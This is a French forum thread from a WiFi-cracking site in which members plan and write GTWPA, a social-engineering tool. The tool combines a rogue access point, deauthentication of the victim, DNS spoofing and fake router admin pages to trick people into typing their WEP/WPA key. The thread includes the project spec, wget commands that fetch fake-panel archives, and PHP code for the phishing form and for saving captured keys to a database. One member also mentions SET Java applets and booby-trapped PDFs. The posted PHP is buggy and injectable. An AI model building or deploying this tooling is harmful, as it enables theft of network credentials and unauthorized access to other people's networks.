Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-10-2010 22:06:34

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

[PRO]GTWPA (Developpers)

GTWPA

Présentation:

    GTWPA est un outils usant du social engineering pour récuperer la clée d'un réseau wifi. Son fonctionnement est relativement simple: il créé un point d'accès wifi à l'aide d'airbase-ng, démarre un serveur http (apache2) avec des pages web ressemblant à un panel d'administration de routeur. Ces pages web demande les identifiants du réseau wifi prétextant une mise à jour du routeur puis les stocke dans une base de donné.

Cahier des charges:

    -Rédaction en python
    -Création d'un point d'accès wifi
    -Déconnexion de la victime ciblé
    -Utilisation d'un serveur http (apache2)
    -Utilisation de dnsspoof
    -Redirection de la victime vers le faux panel
    -Update des faux panel d'administrations
    -Stockage des clée obtenu dans une base de donnée

Besoins:

    -Codeurs python --> Redaction du programmes
    -Codeurs sql --> Redaction de la partie base de donnée (nécessaire pour la recupération des identifiants et pour l'affichage de ceux-ci)
    -Codeurs html --> Redaction des faux panels d'administrations

Membres:

    *Codeurs python:
        -Squaks
        -Carto_

    *Codeurs sql:
        -Dack

    *Codeurs html:
        -Dack

Voilà pour la présentation, si vous voulez participer à ce projet communautaire, n'hésitez pas à vous signalez smile


Sharkoff

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-10-2010 22:40:28

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

A mon humble avis, les faux panels ont besoins d'etre recoder tellement que c'est le bordel dans le code source ...

Sinon pour l'inscription dans la base de donnée, j'aurais pensée à un fichier unique qu'on "includerais" aux différents panels non ?


Sharkoff

Hors Ligne

#3 07-10-2010 22:43:10

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : [PRO]GTWPA (Developpers)

il faudrait faire livebox et neufbox c'est les plus souvent vu

Hors Ligne

#4 07-10-2010 22:46:35

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

J'abandonne le html/css, c'est vraiment pas mon truc hmm

Dernière modification par Squaks (07-10-2010 23:22:38)


Sharkoff

Hors Ligne

#5 08-10-2010 15:07:03

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Mmmmm je suis entrain d'apprender à coder en G.U.I donc je profite de mon apprentissage pour me lancer dans l'optimisation du programme en GUI. L'idée est que tout soit en interface visuelle (ça va être moche du départ mais avec un peu de travail je vais arriver à rentre ça classe).


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#6 08-10-2010 15:21:08

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Okey, sinon je pourrais avoir le code python pour voir ce qu'il reste à faire ?


Sharkoff

Hors Ligne

#7 08-10-2010 15:34:40

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Oulah, pour le moment tu n'y comprendrais rien je suis en plein dans mes brouillons avec cette histoire de G.U.I.
Tout est fonctionnel (en shell), mais pas encore d'option déauth.

En gros :

- Installation de GTWPA
- Configuration de la Rogue (Channel, ESSID .. & Co)
- Lancement de l'AP et REDIRECTION de la victime sur la Fake Page

Je poste le Code Ce soir quand j'aurais fait un peu le "tri" dedans smile

ok ?


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#8 08-10-2010 15:50:18

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Okey smile

Essaye de faire la GUI vraiment independante des autres commandes

Dernière modification par Squaks (08-10-2010 15:56:00)


Sharkoff

Hors Ligne

#9 08-10-2010 17:38:43

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

J'essaye j'essaye, je comprends bien l'intérêt mais dans la mesure ou je commence juste à apprendre le fonctionnement du GUI Python avec Tkinter, il ne faut pas en attendre trop.

Je continue donc le dev du tool en shell, qui sera quand même le plus intéressant, le GUI reste un truc de kikoo


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#10 08-10-2010 17:53:36

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Si tu fais une GUI, utilise plutot pyGTK qui est bien plus complet wink

J'ai fais toute la configuration d'apache smile

Dernière modification par Squaks (08-10-2010 17:55:37)


Sharkoff

Hors Ligne

#11 08-10-2010 19:15:37

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : [PRO]GTWPA (Developpers)

hello
je veut bien aider si vous avez une propositions de rôle si c dans mes cordes enjoy ou comme bêta testeur sinon

Hors Ligne

#12 08-10-2010 19:58:49

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Il faudrait faire les fake panel d'administration si ca te branche sinon il faut attendre le script pour voir ce qu'il reste à faire.


Sharkoff

Hors Ligne

#13 08-10-2010 20:04:57

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

@Veidam : Si tu te connais en php et sql, je veux bien de ton aide.

Squaks a écrit :

A mon humble avis, les faux panels ont besoins d'etre recoder tellement que c'est le bordel dans le code source ...

Sinon pour l'inscription dans la base de donnée, j'aurais pensée à un fichier unique qu'on "includerais" aux différents panels non ?

Je pourrais avoir les codes sources des panels actuelles ? Je ne les trouve pas.

Pour la base de donnée, ouai on peut faire ca, ca me faira du travail à moins ^^

PS : C'est pas includerais, c'est inclurais. C'est le verbe inclure mais en php, ca s'appelle include.

Dernière modification par Dack (08-10-2010 20:07:19)

Hors Ligne

#14 08-10-2010 20:10:36

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Voilà wink

wget -q http://www.crack-wifi.com/tl/Numericable.tar.gz
wget -q http://www.crack-wifi.com/tl/Freebox.tar.gz
wget -q http://www.crack-wifi.com/webcapitain/rogue_php.zip
wget -q http://www.crack-wifi.com/webcapitain/neuf_php.zip
wget -q http://www.crack-wifi.com/tl/Speedtouch.tar.gz
wget -q http://www.crack-wifi.com/tl/Neufbox.tar.gz

PS: A mon avis on dit inclurais wink

Edit: Hum, tu as edité ton poste tout juste à temps tongue

Dernière modification par Squaks (10-10-2010 10:24:12)


Sharkoff

Hors Ligne

#15 08-10-2010 20:19:59

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : [PRO]GTWPA (Developpers)

je veux bien essayer de coder de fausses page html/css php mais je me sert de set pour aplet java et de pdf piége

et aussi je ne vois pas l'importance d'une bsd mysql pour récupérer les clés et essid le php peut le faire dans un .txt sans écraser les données donc aussi efficace

voir un applet java inclure set a vos script serais je trouve très intéressant

j'ai réussi juste en jouant sur la crédulité et la curiosité

Hors Ligne

#16 08-10-2010 20:48:56

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Pour l'instant on se contente du strict minimum, on verra par la suite pour les fonctionnalitées superflux wink


Sharkoff

Hors Ligne

#17 08-10-2010 20:56:38

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Squaks a écrit :

Voilà wink

wget -q http://www.crack-wpa.fr/tl/Numericable.tar.gz
wget -q http://www.crack-wpa.fr/tl/Freebox.tar.gz
wget -q http://www.crack-wpa.fr/webcapitain/rogue_php.zip
wget -q http://www.crack-wpa.fr/webcapitain/neuf_php.zip
wget -q http://www.crack-wpa.fr/tl/Speedtouch.tar.gz
wget -q http://www.crack-wpa.fr/tl/Neufbox.tar.gz

PS: A mon avis on dit inclurais wink

Edit: Hum, tu as edité ton poste tout juste à temps tongue

Merci wink J'étudierai les codes sources demain matin à tete reposé, je vais voir un film wink
PS : Ouai, je me suis rendu compte de ma faute ^^

Hors Ligne

#18 08-10-2010 21:05:44

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : [PRO]GTWPA (Developpers)

Ok alors bon taf et amusez vous bien curieux de voir le résultat smile

Hors Ligne

#19 09-10-2010 00:38:09

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Super, j'avance !

Pour la G.U.I je galère tellement que je posterai quand je serais arrivé à quelque chose de concluant parce que là c'est pas encore ça !

Mon script fonctionne à merveille (clé dans wpa.txt) et faut juste que je réécrive l'installation puisque j'avais tout viré pour ne garder qu'une page (pour tester plus rapidement).

Dès que c'est tout beau et tout commenté je fous ça ici et roule-ma-poule.


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#20 09-10-2010 08:14:03

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Je viens de faire le faux panels Livebox smile

Je vous propose donc une base commune à tous les faux panels pour faciliter l'automatisation des taches :
-un fichier "index.php" chargé de faire tomber la victime dans le piège (la page de presentation en gros)
-un fichier "valid.php" chargé d'annoncer le succès de la mise à jour/vérification à la victime
-un dossier "data" contenant tous les éléments externes du faux panel (images, javascript, etc ...)
-l'essid et le bssid seront récuperer parmi des fichiers externes (essid.txt et bssid.txt)

La base de "index.php"

<?php
$f_essid=fopen('essid.txt','r');
$essid=fgets($f_essid);
fclose($f_essid);

$f_bssid=fopen('bssid.txt','r');
$bssid=fgets($f_bssid);
fclose($f_bssid);
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
	<head>
		<title>Configuration de <?php echo($essid)?></title>
		<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	</head>
	<body>
		<form method="post" action="valid.php">
			<p>
				<label for="key">Cl&eacute;e WEP/WPA :</label>
				<input type="text" name="key" />
				<br/>
				<label for="key_conf">Confirmation :</label>
				<input type="text" name="key_conf" />
				<br />
				<input style="margin-left: 150px;" type="submit" value="Valider" />
				<input type="hidden" name="essid" value="<?php echo($essid)?>" />
				<input type="hidden" name="bssid" value="<?php echo($bssid)?>" />
			</p>
		</form>
	</body>
</html>

La base de "valid.php"

<?php
$key=$_POST['key'];
$essid=$_POST['essid'];
$bssid=$_POST['bssid'];
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
	<head>
		<title>Configuration de <?php echo($essid)?></title>
		<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	</head>
	<body>
	</body>
</html>

En gardant ces bases, on peut ainsi afficher l'essid n'importe ou avec "<?php echo($essid)?>" et le bssid avec "<?php echo($bssid)?>" et ce dans index.php ET valid.php

Pour l'instant on ne s'occupe pas de la partie stockage de la clée obtenue, on fera les modifs nécessaire lorsque Dack aura finit son script.


Sharkoff

Hors Ligne

#21 09-10-2010 10:47:49

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Je viens de faire un truc vite fait car j'ai internet qui a un probleme donc je suis connecté en tethering avec mon portable.Je n'ai pas apache,mysql et php d'installé sur mon ordi et je ne peux pas le télécharger. Par conséquent, je n'ai pas essayé le script que je viens de coder.

Valid.php :

<?php
include("info.php")
mysql_connect($adresse, $nom, $motdepasse);
mysql_select_db($database);
$essid=$_POST['essid'];
$bssid=$_POST['bssid'];
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
	<head>
	        <title>Configuration de <?php echo($essid)?></title>
	        <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	</head>
	<body>
	    	<?php
			if (!empty($_POST['key']) && !empty($_POST['key_conf']) ) // Vérifie si les variables des clés ne sont pas vides.
		{
		$key=$_POST['key'];
		$key_conf=$_POST['key_conf'];
                   		if (strlen($key) >7 && strlen($key) <63 )
			{

					if ( $key = $key_conf) // Vérifie si les deux clés sont identiques
				{
				mysql_query('INSERT INTO rogue(cle, essid, bssid) VALUES ("'.$key" , "'.$essid.'" , "'.$bssid.'")'); // Insertion dans base de donnée
				echo ' Message ';
				}
			
					else
				{
				echo' Vos cl&eacute;es WPA ne sont pas identiques. Veuillez recommencer. ';
				}
			}
			
				else
			{
			echo 'Cette cl&eacute;e WPA n'est pas valide, elle est trop courte.'
			}

		}
			else
		{
		echo 'Une erreur s\'est produite. Veuillez recommencer.';
		}
		?>

	</body>
</html>

Et le fichier info.php qui contient les informations pour la base sql :

<?php

$adresse = 'localhost';
$nom = 'root';
$motdepasse = '';
$database = 'test';

?>

Il faudra modifier les messages d'erreur ou de confirmation, je ne savais pas quoi mettre.
Ce n'est qu'un début, il faudrait faire un script qui installe la base de donnée et qui crée lui-meme la base de donnée avec toutes les informations sauf que le python je ne connais pas

Dernière modification par Dack (09-10-2010 13:25:27)

Hors Ligne

#22 09-10-2010 12:20:07

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Les vérifications du formulaire seront faites non pas avec du php mais avec du javascript qui à mon gout est bien plus simple wink

Sinon il y a le module python "sqlite3" pour la création de la base de donnée smile


Sharkoff

Hors Ligne

#23 09-10-2010 13:07:18

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Squaks a écrit :

Les vérifications du formulaire seront faites non pas avec du php mais avec du javascript qui à mon gout est bien plus simple wink

Sinon il y a le module python "sqlite3" pour la création de la base de donnée smile

Et si la victime n'a pas javascript d'installer ? Ou tu veux faire avec Ajax ?
Sinon je ne vois pas ce qui est difficile avec du php.

D'accord, je regarde pour sqlite3 mais vu que je ne suis pas normalement cette apres-midi, j'aurais du mal à m'en occuper.

PS : Pour le chan IRC, comment on fait ? On l'héberge sur crack-wifi si M1ck3y veut bien ou on crée un serveur IRC sur une de nos machines ?

Dernière modification par Dack (09-10-2010 13:10:26)

Hors Ligne

#24 09-10-2010 13:19:40

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Connais pas Ajax ... Le javascript n'a pas besoin d'installation, et il est activer sur la plupart des navigateurs ... Je trouve cette methode plus facile car elle permet d'éviter la génération d'une autre page (on pop juste une messagebox si la clée est trop petite ou si la confirmation de celle-ci n'est pas valide et on annule l'envoi du formulaire).

Pour le chan IRC j'en ai aucune idée ... Ayant des coupure intempestive d'internet sur mon ordi, je peux pas l'héberger, si M1ck3y est ok, ca pourrait faciliter les choses smile

Dernière modification par Squaks (09-10-2010 13:20:59)


Sharkoff

Hors Ligne

#25 09-10-2010 13:30:12

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Je comprends mieux maintenant pour l'utilisation de javascript wink Dans tout les cas, je viens de modifier mon script pour qu'il vérifie la taille de la clée ( 7<$key<63)

Pareil pour mon ordi, je ne sais pas ce qu'a Internet en ce moment mais c'est casse-couille.
Je vais lui envoyer un mail wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
203 62852 07-10-2012 14:39:37 par 39max
Je recherche GTWPA par Linquant
4 2109 14-04-2011 12:25:15 par Linquant
0 6166 08-12-2010 22:50:28 par M1ck3y
GTWPA par sardineeMule
4 2207 27-12-2008 16:46:11 par sardineeMule

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.064 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]